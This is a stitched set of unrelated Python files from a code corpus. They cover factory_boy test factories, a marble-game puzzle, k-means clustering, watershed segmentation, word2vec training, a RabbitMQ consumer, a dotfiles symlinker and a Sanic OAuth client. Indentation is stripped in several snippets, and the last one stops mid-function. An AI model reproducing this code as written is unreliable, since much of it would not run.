plugin_dicts = []
for obj in plugin_obj_list:
plugin_dicts.append(obj.to_dict())
return plugin_dicts
def get_plugins_by_type(session, plugin_type):
"""Get plugins based on type argument
:param plugin_type: Plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type})
def get_plugins_by_group(session, plugin_group):
"""Get plugins by plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"group": plugin_group})
def get_plugins_by_group_type(session, plugin_group, plugin_type):
"""Get plugins by group and plugin type
:param plugin_group: Plugin group
:type plugin_group: `str`
:param plugin_type: plugin type
:type plugin_type: `str`
:return: List of plugin dicts
:rtype: `list`
"""
return get_all_plugin_dicts(session, {"type": plugin_type, "group": plugin_group})
| StarcoderdataPython |
1602226 | <gh_stars>1-10
import factory
from .. import db
from ..model.bookmark import Bookmark, Tag, Link
from ..model.user import User
class SQLAlchemyGetOrCreateOptions(factory.alchemy.SQLAlchemyOptions):
def _build_default_options(self):
return super(SQLAlchemyGetOrCreateOptions, self)._build_default_options() + [
factory.base.OptionDefault("sqlalchemy_get_or_create", (), inherit=True)
]
class SQLAlchemyGetOrCreateModelFactory(factory.alchemy.SQLAlchemyModelFactory):
_options_class = SQLAlchemyGetOrCreateOptions
@classmethod
def _get_or_create(cls, model_class, *args, **kwargs):
session = cls._meta.sqlalchemy_session
if session is None:
raise RuntimeError("No session provided.")
filters = {}
for field in cls._meta.sqlalchemy_get_or_create:
if field not in kwargs:
# TODO: should be factory.errors.FactoryError
raise RuntimeError(
"Unable to find initialization value for '%s' in factory %s"
                    % (field, cls.__name__)
)
filters[field] = kwargs[field]
with session.no_autoflush:
return session.query(model_class).filter_by(**filters).one_or_none()
@classmethod
def _create(cls, model_class, *args, **kwargs):
if cls._meta.sqlalchemy_get_or_create:
obj = cls._get_or_create(model_class, *args, **kwargs)
if obj is not None:
return obj
return super(SQLAlchemyGetOrCreateModelFactory, cls)._create(model_class, *args, **kwargs)
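# Sketch of how the get-or-create behaviour above is meant to be used (hypothetical
# factory and model, not defined in this module):
#
#     class CountryFactory(SQLAlchemyGetOrCreateModelFactory):
#         class Meta:
#             model = Country
#             sqlalchemy_get_or_create = ("code",)
#         code = "US"
#
#     CountryFactory(code="US")  # first call inserts a row, later calls return the same row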
# https://factoryboy.readthedocs.io/en/latest/reference.html#inheritance According to the
# documentation the sequence counter *won't* be shared across children classes since they do not
# share the same model as their parent class.
class BaseModelFactory(SQLAlchemyGetOrCreateModelFactory):
class Meta:
sqlalchemy_session = db.Session
class UserFactory(BaseModelFactory):
class Meta:
model = User
username = factory.Sequence(lambda n: "{}{}".format(factory.Faker("user_name"), n))
    email = factory.LazyAttribute(lambda obj: "{}@example.com".format(obj.username))  # placeholder domain (assumed); original value not recoverable
display_name = factory.Faker("name")
password = factory.Faker("password")
active = True
admin = False
class TagFactory(BaseModelFactory):
class Meta:
model = Tag
sqlalchemy_get_or_create = ("name",)
name = factory.Sequence(lambda n: "{}{}".format(factory.Faker("word"), n))
class LinkFactory(BaseModelFactory):
class Meta:
model = Link
href = factory.Sequence(lambda n: "{}?foo={}".format(factory.Faker("uri"), n))
class BookmarkFactory(BaseModelFactory):
class Meta:
model = Bookmark
title = factory.Faker("sentence", nb_words=6)
notes = factory.Faker("text")
private = False
# tags = factory.SubFactory(TagFactory)
# href = factory.SubFactory(LinkFactory)
# user = factory.SubFactory(UserFactory)
@factory.post_generation
def user(self, create, extracted, **kwargs):
if not create:
return
if extracted:
self.user = extracted
@factory.post_generation
def tags(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for tag in extracted:
self.tags.append(tag)
@factory.post_generation
def link(self, create, extracted, **kwargs):
if not create:
return
if extracted:
self.link = extracted
else:
# let's provide a default for the link
self.link = LinkFactory.create()
| StarcoderdataPython |
171456 | from collections import defaultdict, deque
from datetime import datetime
def find_high_score(player_num, last_marble_value):
"""
>>> find_high_score(7, 25)
32
>>> find_high_score(10, 1618)
8317
>>> find_high_score(13, 7999)
146373
>>> find_high_score(17, 1104)
2764
>>> find_high_score(21, 6111)
54718
>>> find_high_score(30, 5807)
37305
>>> find_high_score(470, 72170)
388024
:param player_num: The number of players in this game.
:param last_marble_value: The value of the last marble played before the game ended.
:return: The high score for that game.
"""
player_scores = defaultdict(int)
marble_locations = deque()
marble_locations.append(0)
current_marble_value = 1
player_id = 1
while current_marble_value <= last_marble_value:
if current_marble_value % 23 == 0:
player_scores[player_id] += current_marble_value
marble_locations.rotate(7)
marble_to_remove = marble_locations.pop()
player_scores[player_id] += marble_to_remove
marble_locations.rotate(-1)
else:
marble_locations.rotate(-1)
marble_locations.append(current_marble_value)
current_marble_value += 1
player_id += 1
if player_id > player_num:
player_id = 1
high_score = 0
for player in player_scores.keys():
if player_scores[player] > high_score:
high_score = player_scores[player]
return high_score
if __name__ == "__main__":
start_time = datetime.now()
print(f"Part 1 high score: {find_high_score(470, 72170)} Runtime {datetime.now() - start_time}")
start_time = datetime.now()
print(f"Part 2 high score: {find_high_score(470, 7217000)} Runtime {datetime.now() - start_time}")
| StarcoderdataPython |
156152 |
# coding: utf-8
# In[7]:
import numpy as np
from sklearn import cluster
from scipy.cluster.vq import whiten
k = 50
kextra = 10
num_recs = 645
seed = 2
segment_file = open('bird_data/supplemental_data/segment_features.txt',
'r')
##clean
line = segment_file.readline()
line = segment_file.readline()
index = 0
while line != '':
tokens = line.split(',')
    nums = list(map(float, tokens))
    nums = nums[2:]  # Omit recid and segid
if index == 0:
segfeatures = nums
else:
segfeatures = np.vstack((segfeatures, nums))
line = segment_file.readline()
index += 1
#Before running k-means, it is beneficial to rescale each feature dimension of the observation set with whitening.
#Each feature is divided by its standard deviation across all observations to give it unit variance.
#From documentation in scikit-learn
segfeatures = whiten(segfeatures)
# In[8]:
segfeatures
# In[14]:
kmeans1 = cluster.KMeans(n_clusters=k, init='k-means++', n_init=k,
max_iter=300, random_state=seed)
kmeans2 = cluster.KMeans(n_clusters=kextra, init='k-means++', n_init=k,
max_iter=300, random_state=seed)
clusters1 = kmeans1.fit_predict(segfeatures)
clusters2 = kmeans2.fit_predict(segfeatures)
segment_file = open('bird_data/supplemental_data/segment_features.txt',
'r')
segment_file.seek(0)
line = segment_file.readline()
line = segment_file.readline()
index = 0
prev_rec_id = -1
hist = np.zeros((num_recs, k + kextra))
while line != '':
    tokens = line.split(',')
    rec_id = int(tokens[0])
    if rec_id != prev_rec_id:
        # keep track of which recording this segment belongs to
        prev_rec_id = rec_id
hist[rec_id][clusters1[index]] += 1
hist[rec_id][k + clusters2[index]] += 1
line = segment_file.readline()
if line == '':
break
index += 1
segment_file.close()
histfilename = 'hist.txt'
histfile = open(histfilename, 'w')
histfile.write('rec_id,[hist]\n')
for rec_id in range(num_recs):
histfile.write('%d,' % rec_id)
for col in range(k + kextra - 1):
histfile.write('%f,' % hist[rec_id][col])
histfile.write('%f\n' % hist[rec_id][col + 1])
histfile.close()
# In[ ]:
| StarcoderdataPython |
3355363 | import cv2
import os
import glob
import argparse
import numpy as np
from matplotlib import pyplot as plt
from scipy import ndimage as ndi
from skimage.segmentation import watershed
from skimage.feature import peak_local_max
def segment(img, mask):
mask = cv2.bitwise_not(mask)
img_masked = cv2.bitwise_and(img, img, mask=mask)
img_out = cv2.subtract(img, img_masked)
return img_out
def water_shed(img, threshold=50):
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
ret, img_thres = cv2.threshold(img, threshold, 255, cv2.THRESH_BINARY|cv2.THRESH_OTSU)
distance = ndi.distance_transform_edt(img_thres)
local_maxi = peak_local_max(distance, min_distance=30, indices=False, labels=img_thres)
markers = ndi.label(local_maxi, structure=np.ones((3, 3)))[0]
labels = watershed(-distance, markers, mask=img_thres)
return labels
def dis_watershed(img, thres_distance=5, threshold=50):
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
ret, img_thres = cv2.threshold(gray, threshold, 255, cv2.THRESH_BINARY|cv2.THRESH_OTSU)
distance = ndi.distance_transform_edt(img_thres)
local_maxi = peak_local_max(distance, min_distance=30, indices=False, labels=img_thres)
peak_list = list()
for r in range(local_maxi.shape[0]):
for c in range(local_maxi.shape[1]):
if local_maxi[r][c] != False:
peak_list.append((r, c))
final_peak = list()
for r, c in peak_list:
tag = True
for peak in final_peak:
if abs(peak[0]-r)+abs(peak[1]-c) <= thres_distance:
tag = False
local_maxi[r][c] = False
break
if tag:
final_peak.append((r, c))
markers = ndi.label(local_maxi, structure=np.ones((3, 3)))[0]
labels = watershed(-distance, markers, mask=img_thres)
return labels
if __name__ == "__main__":
parse = argparse.ArgumentParser()
parse.add_argument('-d', '--dataset', type=str, required=True, help='Input image dataset')
parse.add_argument('-f', '--footprint_shape', type=int, required=False, help='Footprint shape of WaterShed', default=9)
parse.add_argument('-t', '--threshold', type=int, required=False, help='WaterShed threshold', default=50)
args = parse.parse_args()
# load the prediction image
image_list = glob.glob(os.path.join(args.dataset, '*_rgb_res.png'))
threshold = args.threshold
shape = (args.footprint_shape, args.footprint_shape)
# start to watershed the image
for image in image_list:
image_name = image.replace('_rgb_res.png', '')
print('Processing', image_name, end='\t')
img_res = cv2.imread(image_name+'_rgb_res.png', 0)
img_original = cv2.imread(image_name+'_rgb.png')
img_original = cv2.cvtColor(img_original, cv2.COLOR_BGR2RGB)
img_plant = segment(img_original, img_res)
# two way of segment
# label = water_shed(img_plant)
label = dis_watershed(img_plant)
# save the label image
plt.imsave(image_name+'_ws.png', label, cmap='gray', format='png')
print('Done!')
| StarcoderdataPython |
3331702 | """Sub-module with utilities to make experiments easier to write."""
from embiggen.utils.abstract_models import (
AbstractClassifierModel,
AbstractEmbeddingModel,
EmbeddingResult,
AbstractModel,
get_models_dataframe,
get_available_models_for_node_label_prediction,
get_available_models_for_edge_prediction,
get_available_models_for_edge_label_prediction,
get_available_models_for_node_embedding,
abstract_class,
format_list
)
from embiggen.utils.pipeline import classification_evaluation_pipeline
from embiggen.utils.number_to_ordinal import number_to_ordinal
__all__ = [
"AbstractClassifierModel",
"AbstractEmbeddingModel",
"EmbeddingResult",
"AbstractModel",
"classification_evaluation_pipeline",
"build_init",
"format_list",
"get_models_dataframe",
"get_available_models_for_node_label_prediction",
"get_available_models_for_edge_prediction",
"get_available_models_for_edge_label_prediction",
"get_available_models_for_node_embedding",
"abstract_class",
"number_to_ordinal",
"format_list"
]
| StarcoderdataPython |
3308804 | # Copyright 2020 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module starts SDC with only default stage libs like basic and runs pipelines for tests.
import logging
import pytest
from streamsets.testframework.markers import sdc_activation, sdc_min_version
from .utils.utils_activation import ACTIVATION_SUPPORT_SDC_MIN_VERSION, register_and_activate_sdc
# Skip all tests in this module if --sdc-version < 3.15.0
pytestmark = sdc_min_version(ACTIVATION_SUPPORT_SDC_MIN_VERSION)
logger = logging.getLogger(__name__)
@sdc_activation
@pytest.mark.parametrize('activate_sdc', [False, True])
def test_with_basic_stage_loaded(sdc_executor, activate_sdc, jms):
"""SDC is loaded only with default basic stages.
The pipelines with basic lib stages should be able to run when SDC is not activated. activate_sdc = False
The pipelines with basic lib stages should be able to run when SDC is activated. activate_sdc = true
"""
if activate_sdc:
register_and_activate_sdc(sdc_executor)
_test_basic_stage(sdc_executor)
def _test_basic_stage(sdc_executor):
pipeline_builder = sdc_executor.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.data_format = 'JSON'
dev_raw_data_source.raw_data = '{"emp_id" :"123456"}'
dev_raw_data_source.stop_after_first_batch = True
wiretap = pipeline_builder.add_wiretap()
dev_raw_data_source >> wiretap.destination
pipeline = pipeline_builder.build()
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
assert len(wiretap.output_records) == 1
assert wiretap.output_records[0].field['emp_id'].value == '123456'
| StarcoderdataPython |
1751932 | from __future__ import print_function
import collections
import math
import numpy as np
import random
import tensorflow as tf
from six.moves import range
from assignment5_word2vec.dataset import vocabulary_size, loadDataset
data, count, dictionary, reverse_dictionary = loadDataset()
class BatchGenerator():
def __init__(self, array, windowSize, rndSeed=21344):
self.array = array
self.N = len(array)
self.windowSize = windowSize
# indexes of elements in array that have at least windowSize elements to each size
self.sampledIndexes = np.arange(windowSize, self.N - windowSize)
np.random.seed(rndSeed)
self.iter = 0
def __call__(self, batchSize):
#indexes = np.random.choice(self.sampledIndexes, batchSize, replace=False)
indexes = np.empty(batchSize, dtype='int64')
for i in range(batchSize):
indexes[i] = self.sampledIndexes[self.iter]
self.iter = (self.iter + 1) % len(self.sampledIndexes)
windows = np.empty(batchSize*self.windowSize*2, dtype='int64')
wi = 0
# write filling of the array more efficiently, with numpy
for i in indexes:
for j in range(1, self.windowSize+1):
windows[wi] = self.array[i+j]; wi += 1
windows[wi] = self.array[i-j]; wi += 1
centers = np.empty((batchSize, 1), dtype='int64')
for i in range(batchSize): centers[i,0] = self.array[indexes[i]]
return centers, windows
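# Shape sketch for BatchGenerator.__call__ above: with window size w, __call__(batch_size)
# returns centers of shape (batch_size, 1) (the word id at each sampled position) and
# windows of shape (batch_size * 2 * w,) (the 2*w context word ids per center, concatenated);
# train_cbow below feeds windows as train_dataset and centers as train_labels.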
def test_batch():
bg = BatchGenerator(data, 1)
ind, win = bg(3)
print(ind)
print(win)
def train_cbow(learnRate=1.0, num_sampled = 64, train_steps = 100001, window_size = 1):
batch_size = 128
embedding_size = 128 # Dimension of the embedding vector.
# We pick a random validation set to sample nearest neighbors. here we limit the
# validation samples to the words that have a low numeric ID, which by
# construction are also the most frequent.
valid_size = 16 # Random set of words to evaluate similarity on.
valid_window = 100 # Only pick dev samples in the head of the distribution.
valid_examples = np.array(random.sample(range(valid_window), valid_size))
# Number of negative examples to sample.
graph = tf.Graph()
with graph.as_default(): #, tf.device('/cpu:0'):
# Input data.
train_dataset = tf.placeholder(tf.int32, shape=[batch_size * window_size * 2])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(valid_examples, dtype=tf.int32)
# Variables.
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0))
softmax_weights = tf.Variable(
tf.truncated_normal([vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size)))
softmax_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Model.
# Look up embeddings for inputs.
embed = tf.nn.embedding_lookup(embeddings, train_dataset)
embed = tf.reduce_sum(tf.reshape(embed, (batch_size, window_size * 2, embedding_size)), 1)
# Compute the softmax loss, using a sample of the negative labels each time.
loss = tf.reduce_mean(
tf.nn.sampled_softmax_loss(weights=softmax_weights, biases=softmax_biases, inputs=embed,
labels=train_labels, num_sampled=num_sampled, num_classes=vocabulary_size))
# Optimizer.
# Note: The optimizer will optimize the softmax_weights AND the embeddings.
# This is because the embeddings are defined as a variable quantity and the
# optimizer's `minimize` method will by default modify all variable quantities
# that contribute to the tensor it is passed.
# See docs on `tf.train.Optimizer.minimize()` for more details.
optimizer = tf.train.AdagradOptimizer(learning_rate=learnRate).minimize(loss)
# Compute the similarity between minibatch examples and all embeddings.
# We use the cosine distance:
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(
normalized_embeddings, valid_dataset)
similarity = tf.matmul(valid_embeddings, tf.transpose(normalized_embeddings))
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
batchGen = BatchGenerator(data, window_size)
print('Initialized')
average_loss = 0
for step in range(train_steps):
batch_labels, batch_data = batchGen(batch_size)
feed_dict = {train_dataset : batch_data, train_labels : batch_labels}
_, l = session.run([optimizer, loss], feed_dict=feed_dict)
average_loss += l
if step % 2000 == 0:
if step > 0:
average_loss = average_loss / 2000
# The average loss is an estimate of the loss over the last 2000 batches.
print('Average loss at step %d: %f' % (step, average_loss))
average_loss = 0
# note that this is expensive (~20% slowdown if computed every 500 steps)
if step % 10000 == 0:
sim = similarity.eval()
for i in range(valid_size):
valid_word = reverse_dictionary[valid_examples[i]]
top_k = 8 # number of nearest neighbors
nearest = (-sim[i, :]).argsort()[1:top_k+1]
log = 'Nearest to %s:' % valid_word
for k in range(top_k):
close_word = reverse_dictionary[nearest[k]]
log = '%s %s,' % (log, close_word)
print(log)
final_embeddings = normalized_embeddings.eval()
return final_embeddings
if __name__ == '__main__':
#test_batch()
train_cbow()
#train_skipgram(learnRate=0.1)
#train_skipgram(num_sampled=128) | StarcoderdataPython |
3224207 | <filename>python/chapter-7/shovel_consumer.py
###############################################
# RabbitMQ in Action
# Chapter 5 - Shovel Test Consumer
#
# Requires: pika >= 0.9.5
#
# Author: <NAME>
# (C)2011
###############################################
import json
import sys
import pika
def msg_rcvd(channel, method, header, body):
message = json.loads(body)
#/(ctc.1) Print & acknowledge our order
print("Received order %(ordernum)d for %(type)s." % message)
channel.basic_ack(delivery_tag=method.delivery_tag)
if __name__ == "__main__":
#/(ctc.2) Broker settings
AMQP_SERVER = sys.argv[1]
AMQP_PORT = int(sys.argv[2])
#/(ctc.3) Establish broker connection settings
creds_broker = pika.PlainCredentials("guest", "guest")
conn_params = pika.ConnectionParameters( AMQP_SERVER,
port=AMQP_PORT,
virtual_host="/",
credentials=creds_broker)
#/(ctc.5) Establish connection to RabbitMQ
conn_broker = pika.BlockingConnection(conn_params)
channel = conn_broker.channel()
#/(ctc.8) Start processing orders
print("Ready for orders!")
channel.basic_consume( msg_rcvd,
queue="warehouse_carpinteria",
no_ack=False,
consumer_tag="order_processor")
channel.start_consuming()
| StarcoderdataPython |
1697356 | <filename>src/preprocessing.py
from input import *
# creating train, and dev set
train = df.loc[:900] # trainig set
dev = df.loc[901:] # development set to test overfitting
print(train.shape, dev.shape)
print(train.target.value_counts())
print(dev.target.value_counts())
# creating dependent and independent matrix of features
x = train.iloc[:, :-1]
y = train.iloc[:, -1]
print(x.shape, y.shape)
# create training and test sets
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x,y, test_size = 0.25, random_state = 31) | StarcoderdataPython |
112087 | <filename>tests/test_matrix_props/test_is_square.py
"""Test is_square."""
import numpy as np
from toqito.matrix_props import is_square
def test_is_square():
"""Test that square matrix returns True."""
mat = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
np.testing.assert_equal(is_square(mat), True)
def test_is_not_square():
"""Test that non-square matrix returns False."""
mat = np.array([[1, 2, 3], [4, 5, 6]])
np.testing.assert_equal(is_square(mat), False)
def test_is_square_invalid():
"""Input must be a matrix."""
with np.testing.assert_raises(ValueError):
is_square(np.array([-1, 1]))
if __name__ == "__main__":
np.testing.run_module_suite()
| StarcoderdataPython |
72126 | """Module for interacting with the Comet Observations Database (COBS)."""
from io import StringIO
import re
from pathlib import Path
from appdirs import user_cache_dir
from astropy.time import Time
import mechanize
import numpy as np
import pandas as pd
from . import PACKAGEDIR, log
# Where to store COBS data?
CACHEDIR = Path(user_cache_dir("cometcurve"))
# Column numbers of COBS/ICQ data fields
ICQ_COLUMNS = {
'comet': (0, 11),
'date': (11, 21),
'fractional_day': (21, 24),
'method': (26, 27),
'upper_limit': (27, 28),
'magnitude': (28, 32),
'poor': (32, 33),
'aperture': (35, 40),
'instrument': (40, 41),
'observer': (75, 80),
'comments': (130, -1)
}
class CometObservations():
"""Class to interact with the Comet Observation Database (COBS).
Parameters
----------
data : `pandas.DataFrame`
DataFrame returned by `read_cobs()`.
"""
def __init__(self, data=None):
if data is None:
self.data = read_cobs()
else:
self.data = data
def get_observer_list(self):
"""Returns a string listing all observer names.
The names are sorted by number of observations.
"""
return ", ".join(self.data.observer_name.value_counts().keys())
def read_cobs(years=('2020',), comet=None, start=None, stop=None,
allowed_methods=('S', 'B', 'M', 'I', 'E', 'Z', 'V', 'O'),):
"""Returns a `CometObservations` instance containing the COBS database."""
if years == 'all':
years = tuple(range(2018, 2020))
# Read the data
data = []
for yr in np.atleast_1d(years):
try:
dfyr = _get_cache_dataframe(yr)
except FileNotFoundError:
dfyr = download_cobs(yr)
data.append(dfyr)
df = pd.concat(data)
# Remove bad lines defined as follows:
# * date i.e. year does not start with the character 1 or 2 (indicative of ill-formatted ICQ)
# * the magnitude is not missing (character "-")
# * the "poor" column is empty (note: this removes a small number of entries
# for comet 1965S1 where magnitude -10.0 overflows into the poor column).
# * the magnitude is not an upper limit (`df.upper_limit.isna()`)
# * did not use a convential method (cf. `allowed_methods`), i.e. a method
# that does not yield something similar to a V-band integrated magnitude.
bad_data_mask = (df.date.str[0].isin(["1","2"])
& df.poor.isna()
& df.upper_limit.isna())
if df.magnitude.dtype is not float:
bad_data_mask &= df.magnitude != '-'
if allowed_methods != 'all':
bad_data_mask &= df.method.isin(allowed_methods)
df = df[bad_data_mask]
df['time'] = pd.to_datetime(df.date, utc=True) + pd.to_timedelta(df.fractional_day, unit='D')
df['jd'] = Time(df.time).jd
df['magnitude'] = df.magnitude.astype(float)
df['aperture'] = df.aperture.astype(float)
df['visual'] = df.method.isin(('S', 'M', 'B'))
df['binocular'] = df.instrument == 'B'
df['poor'] = df.poor.astype(str) == ":"
df['observer_name'] = df.comments.str.split(pat="[,;]", expand=True)[0]
# Optional data filtering
mask = np.ones(len(df), dtype=bool)
if comet is not None:
mask &= df.comet == comet.replace(" ", "")
if start is not None:
mask &= df.time > start
if stop is not None:
mask &= df.time < stop
df = df[mask]
# Add a column detailing the number of observations by each observer
df_counts = df.observer.value_counts().reset_index()
df_counts.columns = ['observer', 'observations']
df = pd.merge(df, df_counts, on="observer")
return CometObservations(df)
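# Usage sketch (assumes this module is importable and that the COBS download/cache works;
# the comet designation is only an example):
#
#     obs = read_cobs(years=(2020,), comet="2020 F3")
#     print(obs.get_observer_list())
#     print(obs.data[["time", "magnitude", "observer_name"]].head())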
def _parse_icq(fileobj):
"""Parse a International Comet Quarterly (ICQ) format file."""
df = pd.read_fwf(fileobj, colspecs=list(ICQ_COLUMNS.values()),
names=ICQ_COLUMNS.keys(), header=None)
return df
def _get_cache_filename(year=2020):
"""Returns the `Path` to the COBS data file for a given year."""
return CACHEDIR / f'cobs{year}.feather'
def _get_cache_dataframe(year=2020):
fn = _get_cache_filename(year)
if fn.exists():
log.info(f"Loading {fn}")
return pd.read_feather(fn)
else:
raise FileNotFoundError(f"File not found: {fn}")
def download_cobs(year=2020, update=False):
"""Download a year of COBS data and save it in the cache."""
URL = "https://cobs.si/analysis"
cache_fn = _get_cache_filename(year)
if cache_fn.exists() and not update:
raise IOError(f"Data for {year} has already been downloaded. "
"Use `update=True` to download again.")
log.info(f"Retrieving {year} data from {URL}")
br = mechanize.Browser()
br.set_handle_robots(False)
br.open(URL)
br.select_form(nr=0)
br.form['START_DATE'] = f'{year}/01/01 00:00'
br.form['END_DATE'] = f'{year}/12/31 00:00'
br.submit(id="getobs")
resp = None
for link in br.links():
match = re.compile('.*lightcurve_.*.dat').search(link.url)
if match:
log.info(f"Downloading {link.url}")
resp = br.follow_link(link)
break
if resp is None:
raise IOError(f"Could not download COBS data for {year}.")
# Parse the format and save to a feather cache file
df = _parse_icq(StringIO(resp.get_data().decode()))
cache_fn.parent.mkdir(exist_ok=True)
log.info(f"Saving data to {cache_fn}")
df.to_feather(cache_fn)
return df
| StarcoderdataPython |
1679362 | import json
from ansible.module_utils._text import to_bytes, to_text
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
def update_list(a, *args, **kw):
data = {k:kw[k] for k in kw.keys() if k != 'index'}
for k in data:
a[kw['index']][k] = data[k]
return a
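# Illustrative use of the filter above from a playbook (values are made up):
#
#     {{ [{'name': 'a'}, {'name': 'b'}] | update_list(index=1, name='c') }}
#
# returns [{'name': 'a'}, {'name': 'c'}]: every keyword except 'index' is written onto
# the element at position kw['index'].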
class FilterModule(object):
def filters(self):
return {
'update_list': update_list
}
| StarcoderdataPython |
1719367 | #!/usr/bin/env python3
import os, sys, shutil, configparser
if os.name == "nt":
import _winapi
home = os.environ["HOMEDRIVE"] + os.environ["HOMEPATH"]
else:
home = os.environ["HOME"]
def confirm(question, default="y"):
default = default.lower()
if default == "y":
options = "Y/n"
else:
options = "y/N"
# TODO: make this a single character read (no endline)
choice = input("%s (%s)? " % (question, options))
choice = choice.lower()
if choice == "":
choice = default
if choice == "a":
always = True
return choice == "y"
def getboolean(config, section, option, default=False):
try:
return config.getboolean(section, option)
except configparser.NoSectionError:
return default
except configparser.NoOptionError:
return default
def recursive_symlink(path):
config = configparser.ConfigParser()
# read config first
for fn in os.listdir(path):
if fn.lower() == "dotfiles.cfg":
rel_path = os.path.normpath(os.path.join(path, fn))
config.read(rel_path)
for fn in os.listdir(path):
if fn == ".git":
continue
if fn.lower() == "dotfiles.cfg": # reserve filename for dotfiles config
continue
rel_path = os.path.normpath(os.path.join(path, fn))
# if getboolean(config, fn, "pull"): # pull repos before we recurse
# recursive_pull(path)
# recurse or link here?
if os.path.isdir(rel_path) and not getboolean(config, fn, "link"):
recursive_symlink(rel_path)
else:
link_path = os.path.join(home, rel_path)
print("link path: ", link_path)
if os.path.lexists(
link_path
): # and confirm("%s already exists. overwrite? " % link_path):
if os.path.isdir(link_path) and not os.path.islink(link_path):
print("rmtree ", link_path)
shutil.rmtree(link_path)
else:
print("os.remove ", link_path)
os.remove(link_path)
try:
os.makedirs(os.path.dirname(link_path))
except FileExistsError:
pass
print("%s <- %s" % (os.path.abspath(rel_path), link_path))
os.symlink(
os.path.abspath(rel_path),
link_path,
target_is_directory=os.path.isdir(link_path),
)
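# Illustrative dotfiles.cfg entry (the section name is made up): a section named after an
# entry of the directory being walked, with "link = true", makes that entry be symlinked
# as a whole instead of being recursed into:
#
#     [nvim]
#     link = true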
if __name__ == "__main__":
if not confirm(
"Warning: This program will create links, potentially "
+ "overwriting any dotfiles matching between your home directory and "
"this program's subdirectory 'files'. " + "Do you wish to continue",
"n",
):
sys.exit(1)
back = os.getcwd()
os.chdir("files")
recursive_symlink(os.path.join("."))
os.chdir(back)
| StarcoderdataPython |
14723 | <reponame>LuckysonKhaidem/ProjectAlpha
from abc import ABCMeta, abstractmethod
from typing import TypeVar, Generic, List
S = TypeVar('S')
R = TypeVar('R')
"""
.. module:: Operator
:platform: Unix, Windows
:synopsis: Templates for operators.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
class Operator(Generic[S, R]):
""" Class representing operator """
__metaclass__ = ABCMeta
@abstractmethod
def execute(self, source: S) -> R:
pass
@abstractmethod
def get_name(self) -> str:
pass
class Mutation(Operator[S, S]):
""" Class representing mutation operator. """
__metaclass__ = ABCMeta
def __init__(self, probability: float):
if probability > 1.0:
raise Exception('The probability is greater than one: {}'.format(probability))
elif probability < 0.0:
raise Exception('The probability is lower than zero: {}'.format(probability))
self.probability = probability
@abstractmethod
def execute(self, source: S) -> R:
pass
@abstractmethod
def get_name(self) -> str:
pass
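# Illustrative concrete operator (not part of this module's API) showing how the
# templates above are meant to be subclassed; a real mutation would perturb the
# solution with probability `self.probability` instead of returning it unchanged.
class _ExampleIdentityMutation(Mutation):
    """ Example mutation operator that returns the solution unchanged. """
    def execute(self, source: S) -> S:
        return source
    def get_name(self) -> str:
        return 'Example identity mutation'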
class Crossover(Operator[List[S], List[R]]):
""" Class representing crossover operator. """
__metaclass__ = ABCMeta
def __init__(self, probability: float):
if probability > 1.0:
raise Exception('The probability is greater than one: {}'.format(probability))
elif probability < 0.0:
raise Exception('The probability is lower than zero: {}'.format(probability))
self.probability = probability
@abstractmethod
def get_number_of_parents(self):
pass
@abstractmethod
def execute(self, source: S) -> R:
pass
@abstractmethod
def get_name(self) -> str:
pass
class Selection(Operator[S, R]):
""" Class representing selection operator. """
__metaclass__ = ABCMeta
def __init__(self):
pass
@abstractmethod
def execute(self, source: S) -> R:
pass
@abstractmethod
def get_name(self) -> str:
pass
| StarcoderdataPython |
39605 | from inspect import isawaitable
from sanic import Sanic
from sanic.response import redirect, json, text
from sanic.exceptions import SanicException
from sanic_plugin_toolkit import SanicPluginRealm
from sanic_oauthlib.client import oauthclient
def create_oauth(app):
realm = SanicPluginRealm(app)
try:
oauth = realm.register_plugin(oauthclient)
except ValueError as v:
_, oauth = v
return oauth
def create_remote(app, oauth=None):
if not oauth:
oauth = create_oauth(app)
remote = oauth.remote_app(
'dev',
consumer_key='dev',
consumer_secret='devsecret',
request_token_params={'realm': 'email'},
base_url='http://127.0.0.1:5001/api/',
request_token_url='http://127.0.0.1:5001/oauth/request_token',
access_token_method='GET',
access_token_url='http://127.0.0.1:5001/oauth/access_token',
authorize_url='http://127.0.0.1:5001/oauth/authorize'
)
return remote
def create_client(app, oauth=None, remote=None):
if not oauth:
oauth = create_oauth(app)
if not remote:
remote = create_remote(app, oauth)
session = {}
#TODO: make a better client session for test
@app.middleware
async def add_dummy_session(request):
context = oauth.context
shared_context = oauth.context.shared
shared_request_context = shared_context.request[id(request)]
shared_request_context['session'] = session
@app.route('/')
async def index(request):
if 'dev_oauth' in session:
ret = await remote.get('email')
if isinstance(ret.data, dict):
return json(ret.data)
return str(ret.data)
return redirect(app.url_for('login'))
@app.route('/login')
@remote.autoauthorize
async def login(request, context):
return {'callback': app.url_for('authorized', _external=True, _scheme='http')}
@app.route('/logout')
def logout(request):
